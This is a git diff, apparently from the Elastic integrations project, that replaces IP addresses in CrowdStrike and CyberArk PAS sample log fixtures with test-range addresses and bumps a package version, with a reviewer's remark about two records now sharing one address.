"{\"ConfigBuild\":\"1007.4.0009906.1\",\"ConfigStateHash\":\"3429017943\",\"ContextProcessId\":\"66426035996442255\",\"ContextTimeStamp\":\"1604851098.548\",\"Entitlements\":\"15\",\"aid\":\"ffffffff899541b94b9adff8922aa70a\",\"aip\":\"208.193.200.164\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"FirewallDisabled\",\"id\":\"ffffffff-1111-11eb-9d4c-02f402df8c1f\",\"name\":\"FirewallDisabledMacV1\",\"timestamp\":\"1604851040625\"}", + "ingested": "2021-12-09T13:36:11.151393400Z", + "original": "{\"ConfigBuild\":\"1007.4.0009906.1\",\"ConfigStateHash\":\"3429017943\",\"ContextProcessId\":\"66426035996442255\",\"ContextTimeStamp\":\"1604851098.548\",\"Entitlements\":\"15\",\"aid\":\"ffffffff899541b94b9adff8922aa70a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"FirewallDisabled\",\"id\":\"ffffffff-1111-11eb-9d4c-02f402df8c1f\",\"name\":\"FirewallDisabledMacV1\",\"timestamp\":\"1604851040625\"}", "created": "2020-11-08T15:57:20.625Z", "kind": "event", "action": "FirewallDisabled", 
@@ -10992,21 +9709,12 @@
 },
 {
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.30.227.225",
- "vendor": "crowdstrike",
- "ip": "208.30.227.225",
 "serial_number": "fffffffffffaaaaaaaaabbbbbbbb",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "6.31.14404.0"
+ "version": "6.31.14404.0",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "os": {
 "type": "macos",
@@ -11017,11 +9725,11 @@
 },
 "related": {
 "hosts": [
- "208.30.227.225",
+ "67.43.156.14",
 "mac1"
 ],
 "ip": [
- "208.30.227.225"
+ "67.43.156.14"
 ]
 },
 "host": {
@@ -11035,8 +9743,8 @@ "hostname": "mac1" }, "event": { - "ingested": "2021-11-22T09:23:55.466392700Z", - "original": "{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"1636436839.9529998\",\"AgentTimeOffset\":\"125.319\",\"AgentVersion\":\"6.31.14404.0\",\"BiosManufacturer\":\"Apple Inc.\",\"BiosVersion\":\"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)\",\"ChassisType\":\"Laptop\",\"City\":\"San Francisco\",\"ComputerName\":\"mac1\",\"ConfigBuild\":\"1007.4.0014404.1\",\"ConfigIDBuild\":\"14404\",\"Continent\":\"North America\",\"Country\":\"United States\",\"FalconGroupingTags\":\"-\",\"FirstSeen\":\"1625682391.0\",\"HostHiddenStatus\":\"Visible\",\"MachineDomain\":\"none\",\"OU\":\"none\",\"PointerSize\":\"none\",\"ProductType\":\"1\",\"SensorGroupingTags\":\"-\",\"ServicePackMajor\":\"none\",\"SiteName\":\"none\",\"SystemManufacturer\":\"Apple Inc.\",\"SystemProductName\":\"MacBookPro16,2\",\"Time\":\"1636448427.3539999\",\"Timezone\":\"America/Los_Angeles\",\"Version\":\"Big Sur (11.0)\",\"aid\":\"fffffffffffaaaaaaaaabbbbbbbb\",\"aip\":\"208.30.227.225\",\"cid\":\"ffffffff30a3407dae27d0503611022ff\",\"event_platform\":\"Mac\"}" + "ingested": "2021-12-09T13:36:11.151397900Z", + "original": "{\"AgentLoadFlags\":\"0\",\"AgentLocalTime\":\"1636436839.9529998\",\"AgentTimeOffset\":\"125.319\",\"AgentVersion\":\"6.31.14404.0\",\"BiosManufacturer\":\"Apple Inc.\",\"BiosVersion\":\"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)\",\"ChassisType\":\"Laptop\",\"City\":\"San Francisco\",\"ComputerName\":\"mac1\",\"ConfigBuild\":\"1007.4.0014404.1\",\"ConfigIDBuild\":\"14404\",\"Continent\":\"North America\",\"Country\":\"United States\",\"FalconGroupingTags\":\"-\",\"FirstSeen\":\"1625682391.0\",\"HostHiddenStatus\":\"Visible\",\"MachineDomain\":\"none\",\"OU\":\"none\",\"PointerSize\":\"none\",\"ProductType\":\"1\",\"SensorGroupingTags\":\"-\",\"ServicePackMajor\":\"none\",\"SiteName\":\"none\",\"SystemManufacturer\":\"Apple 
Inc.\",\"SystemProductName\":\"MacBookPro16,2\",\"Time\":\"1636448427.3539999\",\"Timezone\":\"America/Los_Angeles\",\"Version\":\"Big Sur (11.0)\",\"aid\":\"fffffffffffaaaaaaaaabbbbbbbb\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022ff\",\"event_platform\":\"Mac\"}" }, "crowdstrike": { "SystemProductName": "MacBookPro16,2", diff --git a/packages/crowdstrike/manifest.yml b/packages/crowdstrike/manifest.yml index 10227b44906..7ad725c64c4 100644 --- a/packages/crowdstrike/manifest.yml +++ b/packages/crowdstrike/manifest.yml @@ -1,6 +1,6 @@ name: crowdstrike title: CrowdStrike Logs -version: 1.1.0 +version: 1.1.1 description: Collect and parse falcon logs from Crowdstrike products with Elastic Agent. type: integration format_version: 1.0.0 diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log index cb662d0ec48..5c630248bf1 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/105_add_file_category.log 
@@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[Address]","ExtraDetails":"","Message":"Add File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File 
Category","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File 
Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File 
Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} 
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log
index 14adbc29da4..f6be50ea2bc 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/106_update_file_category.log
@@ -1,6 +1,6 @@ <5>1 2021-03-08T18:25:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:25:52","IsoTimestamp":"2021-03-08T18:25:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"Administrator","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[components] Old Value=[Address]","ExtraDetails":"","Message":"Update File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File 
Category","GatewayStation":""}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 81.32.170.205\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"81.32.170.205","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 34.66.114.180\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"34.66.114.180","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File 
Category","GatewayStation":""}}} -<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File 
Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_VAGRANT\n Update File Category\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.session\n 67.43.156.13\n \n PSMStatus\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.session","Station":"67.43.156.13","Location":"","Category":"PSMStatus","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMApp_ASR-WIN\n Update File Category\n \n \n PSMLiveSessions\n Root\\PSM-ASR-CYBERARK-WI.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File 
Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} +<5>1 2021-03-14T13:49:38Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:38\n 2021-03-14T13:49:38Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 106\n Update File Category\n Info\n PSMPApp_SSH\n Update File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n _PSMLiveSessions_1\n \n \n \n Update File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:38","IsoTimestamp":"2021-03-14T13:49:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"106","Desc":"Update File Category","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Update File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update File Category","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log index 92fadaab728..2d3df674fa8 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/107_delete_file_category.log 
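Review bot: The address substitution in this hunk is not one-to-one: the last two added records (issuer PSMApp_ASR-WIN at 2021-03-11T20:10:33Z and issuer PSMPApp_SSH at 2021-03-14T13:49:38Z) both now carry `"Station":"67.43.156.15"`, while the lines they replace had distinct stations (34.66.114.180 and 34.71.250.247). Two unrelated PSM live-session records from different issuers therefore look as if they came from the same client, which weakens any test that asserts on the source address of a specific event rather than just on a geo lookup succeeding. The same hunk already uses `67.43.156.13` and `67.43.156.14` from the supported set, so giving one of the two records a different address from that set, e.g. `"Station":"67.43.156.14"` in both the `raw` and the structured `Station` values of the PSMPApp_SSH line, would keep the issuers distinguishable. The full contents of the supported subset are not visible in this diff, so the exact replacement address should be checked against it.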
@@ -1 +1 @@ -<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-15T10:22:24Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:24\n 2021-03-15T10:22:24Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 107\n Delete File Category\n Info\n Administrator\n Delete File Category\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n LastFailDate\n \n Old Value=[1615803137]\n \n Delete File Category\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:24","IsoTimestamp":"2021-03-15T10:22:24Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"107","Desc":"Delete File Category","Severity":"Info","Issuer":"Administrator","Action":"Delete File Category","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"LastFailDate","RequestId":"","Reason":"Old 
Value=[1615803137]","ExtraDetails":"","Message":"Delete File Category","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log index b3191445d81..14e3f7ea832 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/124_rename_file.log 
@@ -1 +1 @@
-<5>1 2021-03-14T13:42:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:42:20\n 2021-03-14T13:42:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 124\n Rename File\n Info\n Administrator\n Rename File\n \n \n PSM\n Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Rename File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:42:20","IsoTimestamp":"2021-03-14T13:42:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"124","Desc":"Rename File","Severity":"Info","Issuer":"Administrator","Action":"Rename File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSH-34.123.103.115-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Rename File","GatewayStation":"10.0.1.20"}}}
